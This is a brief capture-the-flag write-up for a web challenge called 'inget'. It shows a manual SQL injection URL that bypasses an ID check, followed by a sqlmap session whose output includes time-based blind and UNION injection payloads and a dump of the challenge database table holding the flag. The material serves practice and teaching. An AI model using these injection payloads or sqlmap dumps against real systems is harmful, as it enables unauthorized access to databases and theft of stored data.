inget

题目来源: 宜兴网信办

题目描述:

无

题目场景:

http://61.147.171.105:51222

http://61.147.171.105:51222/?id=1%27%20%20or%201=1%20–+

Please enter ID,and Try to bypass

nice : congratulations

Flag Is : cyberpeace{3df1eecfb5f794d6a94eba429f7e2846}

┌──(kwkl㉿kwkl)-[~/HODL/adworld/web/inget]
└─$ sqlmap -u ‘http://61.147.171.105:51222/?id=1’ --dump
___
H
___ [.]__ ___ ___ {1.6.10#stable}
|_ -| . [‘] | .’| . |
|| [(]|||__,| |
||V… || https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:48:20 /2022-12-26/

[13:48:21] [INFO] resuming back-end DBMS ‘mysql’
[13:48:21] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1’ AND (SELECT 3300 FROM (SELECT(SLEEP(5)))mjGn) AND ‘TmJv’='TmJv

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x717a627171,0x564c495a6873625150554d5946684c5154454d797558544c7277594b565946744e774f496f756757,0x7162627a71),NULL-- -

---

[13:48:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.12
[13:48:21] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[13:48:21] [INFO] fetching current database
[13:48:21] [INFO] fetching tables for database: ‘cyber’
[13:48:21] [INFO] fetching columns for table ‘cyber’ in database ‘cyber’
[13:48:21] [INFO] fetching entries for table ‘cyber’ in database ‘cyber’
Database: cyber
Table: cyber
[1 entry]
±—±---------------------------------------------±----------------+
| Id | pw | user |
±—±---------------------------------------------±----------------+
| 3 | cyberpeace{3df1eecfb5f794d6a94eba429f7e2846} | congratulations |
±—±---------------------------------------------±----------------+

[13:48:21] [INFO] table ‘cyber.cyber’ dumped to CSV file ‘/home/kwkl/.local/share/sqlmap/output/61.147.171.105/dump/cyber/cyber.csv’
[13:48:21] [INFO] fetched data logged to text files under ‘/home/kwkl/.local/share/sqlmap/output/61.147.171.105’

[*] ending @ 13:48:21 /2022-12-26/